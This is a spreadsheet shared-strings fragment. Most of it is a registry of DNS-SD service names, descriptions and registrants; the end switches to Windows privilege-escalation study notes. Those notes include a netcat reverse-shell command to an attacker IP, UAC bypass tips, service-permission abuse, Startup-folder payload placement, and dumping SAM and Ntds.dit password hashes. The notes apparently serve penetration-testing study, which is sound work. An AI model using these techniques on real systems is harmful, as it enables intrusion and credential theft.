  </si>
  <si>
    <t>[Jasper_Morgal]</t>
  </si>
  <si>
    <t>[Richard_Morgal]</t>
  </si>
  <si>
    <t>Defined TXT keys: Application will rely upon Bonjour version 3.1.0.1</t>
  </si>
  <si>
    <t>sugarlock-rcp</t>
  </si>
  <si>
    <t>Remote control protocol for Sugarlock consumer electronics devices</t>
  </si>
  <si>
    <t>[Sugarlock_LLC]</t>
  </si>
  <si>
    <t>[Don_Woodward-Sugarlock]</t>
  </si>
  <si>
    <t>supple</t>
  </si>
  <si>
    <t>Supple Service protocol</t>
  </si>
  <si>
    <t>[Dave_Christianson]</t>
  </si>
  <si>
    <t>Defined TXT keys: type url</t>
  </si>
  <si>
    <t>surveillus</t>
  </si>
  <si>
    <t>Surveillus Networks Discovery Protocol</t>
  </si>
  <si>
    <t>[Mark_Lewis_3]</t>
  </si>
  <si>
    <t>[CollabNet]</t>
  </si>
  <si>
    <t>swcards</t>
  </si>
  <si>
    <t>Signwave Card Sharing Protocol</t>
  </si>
  <si>
    <t>[Signwave_Networking]</t>
  </si>
  <si>
    <t>switcher</t>
  </si>
  <si>
    <t>Wireless home control remote control protocol</t>
  </si>
  <si>
    <t>[Steve_Splonskowski]</t>
  </si>
  <si>
    <t>swordfish</t>
  </si>
  <si>
    <t>Swordfish Protocol for Input/Output</t>
  </si>
  <si>
    <t>[Jim_Wallace]</t>
  </si>
  <si>
    <t>swyp</t>
  </si>
  <si>
    <t>Framework for transferring any file from any app, to
      any app on any device: simply with a swÃ¿p.</t>
  </si>
  <si>
    <t>[ExoMachina]</t>
  </si>
  <si>
    <t>[Alexander_List]</t>
  </si>
  <si>
    <t>sxqdea</t>
  </si>
  <si>
    <t>Synchronize! Pro X</t>
  </si>
  <si>
    <t>sybase-tds</t>
  </si>
  <si>
    <t>Sybase Server</t>
  </si>
  <si>
    <t>synclavier</t>
  </si>
  <si>
    <t>Remote control of Synclavier Digital Audio Workstation 
      over local area network.</t>
  </si>
  <si>
    <t>[Synclavier_Digital]</t>
  </si>
  <si>
    <t>[Cameron_Jones]</t>
  </si>
  <si>
    <t>syncopation</t>
  </si>
  <si>
    <t>Syncopation Synchronization Protocol by Sonzea</t>
  </si>
  <si>
    <t>[Sonzea]</t>
  </si>
  <si>
    <t>syncqdea</t>
  </si>
  <si>
    <t>Synchronize! X Plus 2.0</t>
  </si>
  <si>
    <t>synergy</t>
  </si>
  <si>
    <t>Synergy Peer Discovery</t>
  </si>
  <si>
    <t>[Karl_Timmermann]</t>
  </si>
  <si>
    <t>synksharing</t>
  </si>
  <si>
    <t>SynkSharing synchronization protocol</t>
  </si>
  <si>
    <t>[Benjamin_Rister]</t>
  </si>
  <si>
    <t>sztp</t>
  </si>
  <si>
    <t>This service name is used to construct the
      SRV service label "_sztp" for discovering
      SZTP bootstrap servers.</t>
  </si>
  <si>
    <t>[RFC8572]</t>
  </si>
  <si>
    <t>This protocol uses HTTPS as a substrate.</t>
  </si>
  <si>
    <t>taccounting</t>
  </si>
  <si>
    <t>Data Transmission and Synchronization</t>
  </si>
  <si>
    <t>[John_MacMullin]</t>
  </si>
  <si>
    <t>tango</t>
  </si>
  <si>
    <t>Tango Remote Control Protocol</t>
  </si>
  <si>
    <t>[Tony_Amundson]</t>
  </si>
  <si>
    <t>tapinoma-ecs</t>
  </si>
  <si>
    <t>Tapinoma Easycontact receiver</t>
  </si>
  <si>
    <t>[Bonjour]</t>
  </si>
  <si>
    <t>taskcoachsync</t>
  </si>
  <si>
    <t>Task Coach Two-way Synchronization Protocol for iPhone</t>
  </si>
  <si>
    <t>[Jerome_Laheurte]</t>
  </si>
  <si>
    <t>tbricks</t>
  </si>
  <si>
    <t>tbricks internal protocol</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers=1, sesna, seid, setype, cosna, coid,
    cotype, sysna, syna, syid, subsyid, venid, protocols, pid</t>
  </si>
  <si>
    <t>tcode</t>
  </si>
  <si>
    <t>Time Code</t>
  </si>
  <si>
    <t>[Marshall_Anschutz]</t>
  </si>
  <si>
    <t>tcu</t>
  </si>
  <si>
    <t>Tracking Control Unit by RPM-PSI</t>
  </si>
  <si>
    <t>te-faxserver</t>
  </si>
  <si>
    <t>TE-SYSTEMS GmbH Fax Server Daemon</t>
  </si>
  <si>
    <t>[Tobias_Erichsen]</t>
  </si>
  <si>
    <t>teamlist</t>
  </si>
  <si>
    <t>ARTIS Team Task</t>
  </si>
  <si>
    <t>[ARTIS_Software]</t>
  </si>
  <si>
    <t>ted</t>
  </si>
  <si>
    <t>Teddington Controls</t>
  </si>
  <si>
    <t>[Teddington_Bemasan_Ltd]</t>
  </si>
  <si>
    <t>[Nathan_Child_CEng_MEng_Hons_MIET]</t>
  </si>
  <si>
    <t>teleport</t>
  </si>
  <si>
    <t>[Julien_Robert]</t>
  </si>
  <si>
    <t>tenir-rc</t>
  </si>
  <si>
    <t>[Tenir_Software]</t>
  </si>
  <si>
    <t>[Steve_Gums]</t>
  </si>
  <si>
    <t>tera-fsmgr</t>
  </si>
  <si>
    <t>Terascala Filesystem Manager Protocol</t>
  </si>
  <si>
    <t>[Mike_Nuss]</t>
  </si>
  <si>
    <t>tera-mp</t>
  </si>
  <si>
    <t>Terascala Maintenance Protocol</t>
  </si>
  <si>
    <t>test-ok</t>
  </si>
  <si>
    <t>Test Controller Card</t>
  </si>
  <si>
    <t>[TEST-OK_BV]</t>
  </si>
  <si>
    <t>[Jeroen_Ommering]</t>
  </si>
  <si>
    <t>Defined TXT keys: TEST-OK Test Controller Card TCCxxxx</t>
  </si>
  <si>
    <t>tf-redeye</t>
  </si>
  <si>
    <t>ThinkFlood RedEye IR bridge</t>
  </si>
  <si>
    <t>[Matt_Eagar]</t>
  </si>
  <si>
    <t>thing</t>
  </si>
  <si>
    <t>Internet of things service discovery</t>
  </si>
  <si>
    <t>[Aaltronav]</t>
  </si>
  <si>
    <t>[ICT_Manager]</t>
  </si>
  <si>
    <t>Defined TXT keys: version, url, location, privacy, support, vendor, about</t>
  </si>
  <si>
    <t>thumbwrestling</t>
  </si>
  <si>
    <t>tinkerbuilt Thumb Wrestling game</t>
  </si>
  <si>
    <t>[Jamie_Halmick]</t>
  </si>
  <si>
    <t>ticonnectmgr</t>
  </si>
  <si>
    <t>TI Connect Manager Discovery Service</t>
  </si>
  <si>
    <t>[Stephen_Reid]</t>
  </si>
  <si>
    <t>tic-tac-toe</t>
  </si>
  <si>
    <t>Tic Tac Toe game</t>
  </si>
  <si>
    <t>timezone</t>
  </si>
  <si>
    <t>Time Zone Data Distribution Service - non-TLS</t>
  </si>
  <si>
    <t>[RFC7808]</t>
  </si>
  <si>
    <t>This is an extension of the http service.  Defined
      TXT keys: path=&lt;context path&gt; (as per Section 6 of [RFC6763]).</t>
  </si>
  <si>
    <t>timezones</t>
  </si>
  <si>
    <t>Time Zone Data Distribution Service - over TLS</t>
  </si>
  <si>
    <t>This is an extension of the https service.  Defined
      TXT keys: path=&lt;context path&gt; (as per Section 6 of [RFC6763]).</t>
  </si>
  <si>
    <t>tinavigator</t>
  </si>
  <si>
    <t>TI Navigator Hub 1.0 Discovery Service</t>
  </si>
  <si>
    <t>tivo-device</t>
  </si>
  <si>
    <t>TiVo Device Protocol</t>
  </si>
  <si>
    <t>[TiVo_Inc]</t>
  </si>
  <si>
    <t>[Developer_Support_2]</t>
  </si>
  <si>
    <t>tivo-hme</t>
  </si>
  <si>
    <t>TiVo Home Media Engine Protocol</t>
  </si>
  <si>
    <t>[Developer_Support]</t>
  </si>
  <si>
    <t>tivo-mindrpc</t>
  </si>
  <si>
    <t>TiVo RPC Protocol</t>
  </si>
  <si>
    <t>tivo-music</t>
  </si>
  <si>
    <t>TiVo Music Protocol</t>
  </si>
  <si>
    <t>tivo-photos</t>
  </si>
  <si>
    <t>TiVo Photos Protocol</t>
  </si>
  <si>
    <t>tivo-remote</t>
  </si>
  <si>
    <t>TiVo Remote Protocol</t>
  </si>
  <si>
    <t>Defined TXT keys: protocol, path, swversion, platform, TSN</t>
  </si>
  <si>
    <t>tivo-videos</t>
  </si>
  <si>
    <t>TiVo Videos Protocol</t>
  </si>
  <si>
    <t>todogwa</t>
  </si>
  <si>
    <t>2Do Sync Helper Tool for Mac OS X and PCs</t>
  </si>
  <si>
    <t>[Fahad_Gilani]</t>
  </si>
  <si>
    <t>tomboy</t>
  </si>
  <si>
    <t>Tomboy</t>
  </si>
  <si>
    <t>[Alex_Graveley]</t>
  </si>
  <si>
    <t>toothpicserver</t>
  </si>
  <si>
    <t>ToothPics Dental Office Support Server</t>
  </si>
  <si>
    <t>[Milton_Pulis]</t>
  </si>
  <si>
    <t>touch-able</t>
  </si>
  <si>
    <t>iPhone and iPod touch Remote Controllable</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, CtlN, DbId, Ver, DvTy, OSsi, DvSv</t>
  </si>
  <si>
    <t>touch-remote</t>
  </si>
  <si>
    <t>iPhone and iPod touch Remote Pairing</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, DvNm, Pair, RemV, RemN, DvTy</t>
  </si>
  <si>
    <t>tptx-console</t>
  </si>
  <si>
    <t>Coordination service for client users of the TotalPraisTrax iPad application</t>
  </si>
  <si>
    <t>[Randy_Davenport]</t>
  </si>
  <si>
    <t>[Chris_Watson]</t>
  </si>
  <si>
    <t>transmitr</t>
  </si>
  <si>
    <t>Service discovery and media transfer for peer to peer mobile media transfer app</t>
  </si>
  <si>
    <t>[Windward_Code_LLC]</t>
  </si>
  <si>
    <t>[Alex_Belliotti]</t>
  </si>
  <si>
    <t>tri-vis-client</t>
  </si>
  <si>
    <t>triCerat Simplify Visibility Client</t>
  </si>
  <si>
    <t>[Christopher_Karper]</t>
  </si>
  <si>
    <t>tri-vis-server</t>
  </si>
  <si>
    <t>triCerat Simplify Visibility Server</t>
  </si>
  <si>
    <t>tryst</t>
  </si>
  <si>
    <t>Tryst</t>
  </si>
  <si>
    <t>[Francisco_Ryan_Tolma]</t>
  </si>
  <si>
    <t>tsbiis</t>
  </si>
  <si>
    <t>The Social Broadband Interference Information Sharing</t>
  </si>
  <si>
    <t>[Sergio_Luis]</t>
  </si>
  <si>
    <t>Defined TXT keys: there is no TXT keys defined for this protocol</t>
  </si>
  <si>
    <t>tt4inarow</t>
  </si>
  <si>
    <t>Trivial Technology's 4 in a Row</t>
  </si>
  <si>
    <t>[Nicolas_Payette]</t>
  </si>
  <si>
    <t>ttcheckers</t>
  </si>
  <si>
    <t>Trivial Technology's Checkers</t>
  </si>
  <si>
    <t>ttp4daemon</t>
  </si>
  <si>
    <t>TechTool Pro 4 Anti-Piracy Service</t>
  </si>
  <si>
    <t>[Micromat]</t>
  </si>
  <si>
    <t>tunage</t>
  </si>
  <si>
    <t>Tunage Media Control Service</t>
  </si>
  <si>
    <t>[Matt_Patenaude]</t>
  </si>
  <si>
    <t>tuneranger</t>
  </si>
  <si>
    <t>TuneRanger</t>
  </si>
  <si>
    <t>[Acertant]</t>
  </si>
  <si>
    <t>twinlevel</t>
  </si>
  <si>
    <t>detect sanitary product</t>
  </si>
  <si>
    <t>[Oblamatik_AG]</t>
  </si>
  <si>
    <t>[Simon_Ensslen]</t>
  </si>
  <si>
    <t>twosnakes</t>
  </si>
  <si>
    <t>Service to enable multiplayer game called two snakes.</t>
  </si>
  <si>
    <t>[Narendra_Kumar_Reddy_Thummaluru]</t>
  </si>
  <si>
    <t>tyba</t>
  </si>
  <si>
    <t>Tyba control</t>
  </si>
  <si>
    <t>[Tyba_Design_Limited]</t>
  </si>
  <si>
    <t>[Oz_Andrews]</t>
  </si>
  <si>
    <t>Defined TXT keys: PRID, HWSN, VERS</t>
  </si>
  <si>
    <t>tzrpc</t>
  </si>
  <si>
    <t>TZ-Software remote procedure call based synchronization protocol</t>
  </si>
  <si>
    <t>[Thomas_Zwick]</t>
  </si>
  <si>
    <t>ubertragen</t>
  </si>
  <si>
    <t>Ubertragen</t>
  </si>
  <si>
    <t>[Widgetschmie_de]</t>
  </si>
  <si>
    <t>ucdynamics-tuc</t>
  </si>
  <si>
    <t>Tactical Unified Communicator</t>
  </si>
  <si>
    <t>[UC_Dynamics_LLC]</t>
  </si>
  <si>
    <t>[Shaun_Botha]</t>
  </si>
  <si>
    <t>uddi</t>
  </si>
  <si>
    <t>Universal Description, Discovery and Integration</t>
  </si>
  <si>
    <t>[Paul_Denning]</t>
  </si>
  <si>
    <t>Defined TXT keys: TBD</t>
  </si>
  <si>
    <t>uddi-inq</t>
  </si>
  <si>
    <t>Universal Description, Discovery and Integration Inquiry</t>
  </si>
  <si>
    <t>uddi-pub</t>
  </si>
  <si>
    <t>Universal Description, Discovery and Integration Publishing</t>
  </si>
  <si>
    <t>uddi-sub</t>
  </si>
  <si>
    <t>Universal Description, Discovery and Integration Subscription</t>
  </si>
  <si>
    <t>uddi-sec</t>
  </si>
  <si>
    <t>Universal Description, Discovery and Integration Security</t>
  </si>
  <si>
    <t>upnp</t>
  </si>
  <si>
    <t>Universal Plug and Play</t>
  </si>
  <si>
    <t>urlbookmark</t>
  </si>
  <si>
    <t>URL Advertising</t>
  </si>
  <si>
    <t>[Sven_S_Porst]</t>
  </si>
  <si>
    <t>Defined TXT keys: URL=&lt;URL that is advertised&gt;, name=&lt;Name of the bookmark&gt;</t>
  </si>
  <si>
    <t>usp-agt-coap</t>
  </si>
  <si>
    <t>USP discovery</t>
  </si>
  <si>
    <t>[http://www.broadband-forum.org/assignments]</t>
  </si>
  <si>
    <t>Defined TXT keys: see www.broadband-forum.org/assignments</t>
  </si>
  <si>
    <t>usp-agt-http</t>
  </si>
  <si>
    <t>usp-agt-mqtt</t>
  </si>
  <si>
    <t>usp-agt-stomp</t>
  </si>
  <si>
    <t>usp-agt-ws</t>
  </si>
  <si>
    <t>usp-ctr-coap</t>
  </si>
  <si>
    <t>usp-ctr-http</t>
  </si>
  <si>
    <t>usp-ctr-mqtt</t>
  </si>
  <si>
    <t>usp-ctr-stomp</t>
  </si>
  <si>
    <t>usp-ctr-ws</t>
  </si>
  <si>
    <t>uswi</t>
  </si>
  <si>
    <t>Universal Switching Corporation products</t>
  </si>
  <si>
    <t>[Roger_Lemberg]</t>
  </si>
  <si>
    <t>utest</t>
  </si>
  <si>
    <t>uTest</t>
  </si>
  <si>
    <t>[Gregory_Power]</t>
  </si>
  <si>
    <t>uwsgi</t>
  </si>
  <si>
    <t>Unbit Web Server Gateway Interface</t>
  </si>
  <si>
    <t>[Roberto_De_Ioris]</t>
  </si>
  <si>
    <t>ve-decoder</t>
  </si>
  <si>
    <t>American Dynamics VideoEdge Decoder Control Service</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, macaddress, protovers, model, serial, path, idp</t>
  </si>
  <si>
    <t>ve-encoder</t>
  </si>
  <si>
    <t>American Dynamics VideoEdge Encoder Control Service</t>
  </si>
  <si>
    <t>ve-recorder</t>
  </si>
  <si>
    <t>American Dynamics VideoEdge Recorder Control Service</t>
  </si>
  <si>
    <t>vedabase</t>
  </si>
  <si>
    <t>Application specific synchronization protocol</t>
  </si>
  <si>
    <t>[Peter_Kollath_2]</t>
  </si>
  <si>
    <t>Defined TXT keys:  txtvers=1</t>
  </si>
  <si>
    <t>vhusb</t>
  </si>
  <si>
    <t>USB over IP Sharing System</t>
  </si>
  <si>
    <t>[VirtualHere_Pty_Ltd]</t>
  </si>
  <si>
    <t>[Michael_Broadfoot]</t>
  </si>
  <si>
    <t>Defined TXT keys: &lt;serial number of server&gt;</t>
  </si>
  <si>
    <t>virtualdj</t>
  </si>
  <si>
    <t>VirtualDJ Remote Control protocol</t>
  </si>
  <si>
    <t>[Atomix_Productions]</t>
  </si>
  <si>
    <t>[Stephane_Clavel]</t>
  </si>
  <si>
    <t>visel</t>
  </si>
  <si>
    <t>visel Q-System services</t>
  </si>
  <si>
    <t>[Lehpaner_Sasa]</t>
  </si>
  <si>
    <t>Defined TXT keys:   Version=&lt;service version&gt;
  Type=&lt;service type&gt;
  Name=&lt;service Name&gt;
  Zone=&lt;service zone&gt;
  ID=&lt;serviceID&gt;
  SString=&lt;serviceString&gt;
  SString1=&lt;serviceString&gt;</t>
  </si>
  <si>
    <t>voalte2</t>
  </si>
  <si>
    <t>Server location via DNS-SD</t>
  </si>
  <si>
    <t>[Voalte_Inc]</t>
  </si>
  <si>
    <t>[John_Simpson]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, name, (others not publicly documented)</t>
  </si>
  <si>
    <t>voalte3</t>
  </si>
  <si>
    <t>vos</t>
  </si>
  <si>
    <t>Virtual Object System (using VOP/TCP)</t>
  </si>
  <si>
    <t>[Reed_Hedges][Peter_Amstutz]</t>
  </si>
  <si>
    <t>Defined TXT keys:   url=&lt;Object URL with full path&gt;
  type=&lt;Comma-seperated list of object types&gt;
  title=&lt;Short title of service&gt;
  descr=&lt;Short description of service&gt;</t>
  </si>
  <si>
    <t>voxidahmp</t>
  </si>
  <si>
    <t>RTP Mixer/Summation Resource</t>
  </si>
  <si>
    <t>[Accurate_Always_Inc]</t>
  </si>
  <si>
    <t>[Yousef_Shemisa]</t>
  </si>
  <si>
    <t>vrmg-p2p</t>
  </si>
  <si>
    <t>Verimag mobile class protocol over P2P</t>
  </si>
  <si>
    <t>Defined TXT keys: d=&lt;discovery key&gt;, t=&lt;mobile class ID&gt;</t>
  </si>
  <si>
    <t>vue4rendercow</t>
  </si>
  <si>
    <t>VueProRenderCow</t>
  </si>
  <si>
    <t>vxi-11</t>
  </si>
  <si>
    <t>VXI-11 TCP/IP Instrument Protocol</t>
  </si>
  <si>
    <t>wakeywakey</t>
  </si>
  <si>
    <t>[gerry_Brown_associates]</t>
  </si>
  <si>
    <t>[Gerry_Brown]</t>
  </si>
  <si>
    <t>walkietalkie</t>
  </si>
  <si>
    <t>Walkie Talkie</t>
  </si>
  <si>
    <t>wd-2go</t>
  </si>
  <si>
    <t>NAS Service Protocol</t>
  </si>
  <si>
    <t>[Western_Digital]</t>
  </si>
  <si>
    <t>[Rajesh_Batra]</t>
  </si>
  <si>
    <t>wdp</t>
  </si>
  <si>
    <t>Windows Device Portal</t>
  </si>
  <si>
    <t>[Microsoft_Corporation_5]</t>
  </si>
  <si>
    <t>[Hirsch_Singhal]</t>
  </si>
  <si>
    <t>Defined TXT keys: D (device type), S (https port), A (architecture),
    T (tags)</t>
  </si>
  <si>
    <t>web-xi</t>
  </si>
  <si>
    <t>HTTP-based protocol for DAQ devices</t>
  </si>
  <si>
    <t>[Spectris_plc]</t>
  </si>
  <si>
    <t>[Carsten_Hansen]</t>
  </si>
  <si>
    <t>Defined TXT keys: name, version</t>
  </si>
  <si>
    <t>webex</t>
  </si>
  <si>
    <t>Cisco WebEx serials products will release Bonjour based service</t>
  </si>
  <si>
    <t>[Mobile_Team]</t>
  </si>
  <si>
    <t>[Aulion_Huang]</t>
  </si>
  <si>
    <t>we-jell</t>
  </si>
  <si>
    <t>Proprietary collaborative messaging protocol</t>
  </si>
  <si>
    <t>[Vaughn_Amann]</t>
  </si>
  <si>
    <t>Defined TXT keys:   user=&lt;user name&gt;
  stat=&lt;OK, DND, AWY, FWD:uname&gt;
  agent=&lt;agent type&gt;</t>
  </si>
  <si>
    <t>webdav</t>
  </si>
  <si>
    <t>World Wide Web Distributed Authoring and Versioning (WebDAV)</t>
  </si>
  <si>
    <t>[Y_Y_Goland]</t>
  </si>
  <si>
    <t>webdavs</t>
  </si>
  <si>
    <t>WebDAV over SSL/TLS</t>
  </si>
  <si>
    <t>webissync</t>
  </si>
  <si>
    <t>WebIS Sync Protocol</t>
  </si>
  <si>
    <t>[Alex_Kac]</t>
  </si>
  <si>
    <t>wedraw</t>
  </si>
  <si>
    <t>weDraw document sharing protocol</t>
  </si>
  <si>
    <t>[Oleksandr_Zakharchuk]</t>
  </si>
  <si>
    <t>whamb</t>
  </si>
  <si>
    <t>Whamb</t>
  </si>
  <si>
    <t>[Whamb]</t>
  </si>
  <si>
    <t>whistler</t>
  </si>
  <si>
    <t>[Shankar_Prasad_2]</t>
  </si>
  <si>
    <t>wicop</t>
  </si>
  <si>
    <t>WiFi Control Platform</t>
  </si>
  <si>
    <t>[Santorini_LLC]</t>
  </si>
  <si>
    <t>[Cameron_Colpitts]</t>
  </si>
  <si>
    <t>Defined TXT keys: state=&lt;state&gt;
      loc=&lt;location&gt;</t>
  </si>
  <si>
    <t>wifile</t>
  </si>
  <si>
    <t>System for transferring files between 
      mobile device and computer in a local network</t>
  </si>
  <si>
    <t>[Artyom_Nikolaev]</t>
  </si>
  <si>
    <t>witap</t>
  </si>
  <si>
    <t>WiTap Sample Game Protocol</t>
  </si>
  <si>
    <t>[Rory_McGuire_2]</t>
  </si>
  <si>
    <t>witapvoice</t>
  </si>
  <si>
    <t>[Roberto_Garcia]</t>
  </si>
  <si>
    <t>wkgrpsvr</t>
  </si>
  <si>
    <t>Workgroup Server Discovery</t>
  </si>
  <si>
    <t>workstation</t>
  </si>
  <si>
    <t>Workgroup Manager</t>
  </si>
  <si>
    <t>[Kevin_Arnold]</t>
  </si>
  <si>
    <t>wormhole</t>
  </si>
  <si>
    <t>Roku Cascade Wormhole Protocol</t>
  </si>
  <si>
    <t>workgroup</t>
  </si>
  <si>
    <t>Novell collaboration workgroup</t>
  </si>
  <si>
    <t>Defined TXT keys: version=? description=?</t>
  </si>
  <si>
    <t>wpl-ers-http</t>
  </si>
  <si>
    <t>World Programming repository server</t>
  </si>
  <si>
    <t>wpl-ers-zmq</t>
  </si>
  <si>
    <t>writietalkie</t>
  </si>
  <si>
    <t>Writie Talkie Data Sharing</t>
  </si>
  <si>
    <t>[Yin_Ki_Lau]</t>
  </si>
  <si>
    <t>ws</t>
  </si>
  <si>
    <t>Web Services</t>
  </si>
  <si>
    <t>wtc-heleos</t>
  </si>
  <si>
    <t>Wyatt Technology Corporation HELEOS</t>
  </si>
  <si>
    <t>[Brent_Fulgham]</t>
  </si>
  <si>
    <t>wtc-qels</t>
  </si>
  <si>
    <t>Wyatt Technology Corporation QELS</t>
  </si>
  <si>
    <t>wtc-rex</t>
  </si>
  <si>
    <t>Wyatt Technology Corporation Optilab rEX</t>
  </si>
  <si>
    <t>[Roy_Reapor]</t>
  </si>
  <si>
    <t>wtc-viscostar</t>
  </si>
  <si>
    <t>Wyatt Technology Corporation ViscoStar</t>
  </si>
  <si>
    <t>wtc-wpr</t>
  </si>
  <si>
    <t>Wyatt Technology Corporation DynaPro Plate Reader</t>
  </si>
  <si>
    <t>wwdcpic</t>
  </si>
  <si>
    <t>PictureSharing sample code</t>
  </si>
  <si>
    <t>[Marc_Krochmal]</t>
  </si>
  <si>
    <t>Security service to protocols</t>
  </si>
  <si>
    <t>[ITU-T_Study_Group_17]</t>
  </si>
  <si>
    <t>x-on</t>
  </si>
  <si>
    <t>x-on services synchronisation protocol</t>
  </si>
  <si>
    <t>[Matthias_Burghardt]</t>
  </si>
  <si>
    <t>x-plane9</t>
  </si>
  <si>
    <t>[Austin_Meyer]</t>
  </si>
  <si>
    <t>xcodedistcc</t>
  </si>
  <si>
    <t>Xcode Distributed Compiler</t>
  </si>
  <si>
    <t>[Scott_Tooker]</t>
  </si>
  <si>
    <t>xential</t>
  </si>
  <si>
    <t>xential document creation services</t>
  </si>
  <si>
    <t>[Xential]</t>
  </si>
  <si>
    <t>[Michiel_Terpstra]</t>
  </si>
  <si>
    <t>xgate-rmi</t>
  </si>
  <si>
    <t>xGate Remote Management Interface</t>
  </si>
  <si>
    <t>[Tim_Jobling]</t>
  </si>
  <si>
    <t>Defined TXT keys:   tech=value (string)
  model=value (string)
  version=value (string)</t>
  </si>
  <si>
    <t>xmiserver</t>
  </si>
  <si>
    <t>XMI Systems home terminal local connection</t>
  </si>
  <si>
    <t>[XMI_Systems_SA]</t>
  </si>
  <si>
    <t>[CLAUDE_MALLY]</t>
  </si>
  <si>
    <t>Defined TXT keys: coucou</t>
  </si>
  <si>
    <t>xmp</t>
  </si>
  <si>
    <t>Xperientia Mobile Protocol</t>
  </si>
  <si>
    <t>[Henric_Bergh]</t>
  </si>
  <si>
    <t>Defined TXT keys:   txtvers, user, system, nodeid, desc</t>
  </si>
  <si>
    <t>xsanclient</t>
  </si>
  <si>
    <t>Xsan Client</t>
  </si>
  <si>
    <t>xsanserver</t>
  </si>
  <si>
    <t>Xsan Server</t>
  </si>
  <si>
    <t>xsansystem</t>
  </si>
  <si>
    <t>Xsan System</t>
  </si>
  <si>
    <t>xtimelicence</t>
  </si>
  <si>
    <t>xTime License</t>
  </si>
  <si>
    <t>[AppMac_Software]</t>
  </si>
  <si>
    <t>xtshapro</t>
  </si>
  <si>
    <t>xTime Project</t>
  </si>
  <si>
    <t>xul-http</t>
  </si>
  <si>
    <t>XUL (XML User Interface Language) transported over HTTP</t>
  </si>
  <si>
    <t>[Eran_Gampel]</t>
  </si>
  <si>
    <t>yakumo</t>
  </si>
  <si>
    <t>Yakumo iPhone OS Device Control Protocol</t>
  </si>
  <si>
    <t>Z-Wave Service Discovery</t>
  </si>
  <si>
    <t>[Anders_Brandt_2]</t>
  </si>
  <si>
    <t>Defined TXT keys: NIF, EP, LM</t>
  </si>
  <si>
    <t>zeromq</t>
  </si>
  <si>
    <t>High performance brokerless messaging</t>
  </si>
  <si>
    <t>[Daniel_Holth]</t>
  </si>
  <si>
    <t>Defined TXT keys: type, app, label, note</t>
  </si>
  <si>
    <t>zigbee-bridge</t>
  </si>
  <si>
    <t>ZigBee Bridge device</t>
  </si>
  <si>
    <t>[ZigBee_Alliances_Network_Device_working_group]</t>
  </si>
  <si>
    <t>[Leslie_Mulder]</t>
  </si>
  <si>
    <t>Defined TXT keys: see: http://www.zigbee.org/Standards/ZigBeeNetworkDevices</t>
  </si>
  <si>
    <t>zigbee-gateway</t>
  </si>
  <si>
    <t>ZigBee IP Gateway</t>
  </si>
  <si>
    <t>Privilege escalation method</t>
  </si>
  <si>
    <t>Check for</t>
  </si>
  <si>
    <t>First steps</t>
  </si>
  <si>
    <t xml:space="preserve">Aim for a netcat shell (/socat/evil-winrm). Push nc.exe to the target and execute nc.exe -e c:\windows\system32\cmd.exe &lt;kali_ip&gt; &lt;port&gt;. This shell will give you the most use and feedback. Powershell shells have a habit of not showing error messages or command output.
You can push the netcat command into a bat file and execute that to bypass some issues.
</t>
  </si>
  <si>
    <t xml:space="preserve">Check shell integrity level with whoami /all. If it says Mandatory Label\Medium Mandatory Level (or Low Mandatory Level) - it is a low integrity shell and you will have issues. This is most likely caused by UAC. Check LOLBAS for UAC bypass methods, or use Powershell-Empire 'bypassuac' command to automate.
https://lolbas-project.github.io/#
</t>
  </si>
  <si>
    <t xml:space="preserve">Run winPEAS.exe ('winpeas.exe cmd' to include all checks)on target if you are able. This will automate a lot of enumeration, however can take a LONG time to complete. May be better to run in a second shell, while you go through manual enumeration steps in another shell.
</t>
  </si>
  <si>
    <t>Quick wins</t>
  </si>
  <si>
    <t xml:space="preserve">Windows privilege exploitation as per below. SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege are straight to SYSTEM exploits
</t>
  </si>
  <si>
    <t xml:space="preserve">Windows service permissions exploitation as per below.
Check for unquoted service paths, followed by write permissions on those paths
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#unquoted-service-paths
</t>
  </si>
  <si>
    <t xml:space="preserve">If you have a GUI (RDP session or similar) and the ability to launch GUI applications with administrator privileges (can check with tasklist), you may be able to spawn a child process by using File --&gt; Open, then in the top bar (folder path), enter: file://c:/&lt;payload&gt;.
</t>
  </si>
  <si>
    <t>If you can write to c:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp you can place a payload that will be executed upon any user logging in, including administrators.</t>
  </si>
  <si>
    <t xml:space="preserve">Check for OS version vulnerabilities (upnp, etc) using Sherlock - this is included in winPEAS, or can be run through Powershell-Empire or Evil-WinRM
</t>
  </si>
  <si>
    <t xml:space="preserve">Check for services listening locally (127.0.0.1 on netstat -ano), and port forward them out for further enumeration
</t>
  </si>
  <si>
    <t>Exploitation of service permissions</t>
  </si>
  <si>
    <t xml:space="preserve">Services can be enumerated with scripts or manually with commands in the commands page. Permissions can be confirmed with Sysinternals accesschk.exe (details in commands page), as can permissions of associated registry keys. Look at the SERVICE_START_NAME to see which user privileges exploiting that service will gain you.
</t>
  </si>
  <si>
    <t xml:space="preserve">Great victory permissions:
- SERVICE_STOP
- SERVICE_START
- SERVICE_CHANGE_CONFIG
- SERVICE_ALL_ACCESS
Generally speaking for service permission exploitation you will need BOTH the ability to modify the configuration AND restart the service. If it's set to AUTO_START, then you could also get by with system reboot privileges.
</t>
  </si>
  <si>
    <t>Exploitation of Windows system privileges</t>
  </si>
  <si>
    <t xml:space="preserve">UAC bypass
https://github.com/hfiref0x/UACME
Infographic
https://gblobscdn.gitbook.com/assets%2F-LSy0aAo8OKT4I-Ahftv%2F-M1pLXccD-Xefzyv-vHr%2F-M1pLcpLDrzwyEG4Hv82%2Fimage.png?alt=media&amp;token=77479710-1c1c-47d8-91d0-a3f55dc7d29c
</t>
  </si>
  <si>
    <t xml:space="preserve">SeBackupPrivilege 
- Gives you read access any file, as long as  FILE_FLAG_BACKUP_SEMANTICS flag is set (https://github.com/giuliano108/SeBackupPrivilege)
- Use this to dump SAM and System. Grab the hashes and pass them into services (or crack them).
- If target is a domain controller,  grab Ntds.dit as well (https://blog.stealthbits.com/extracting-password-hashes-from-the-ntds-dit-file/)
</t>
  </si>
  <si>
    <t xml:space="preserve">SeTakeOwnershipPrivilege
- Allows you to change ownership of files and set new ACL
</t>
  </si>
  <si>
    <t xml:space="preserve">SeDebugPrivilege
- Various memory injection strategies can be used
- Used by meterpreter 'getsystem'
</t>
  </si>
  <si>
    <t xml:space="preserve">SeRestorePrivilege
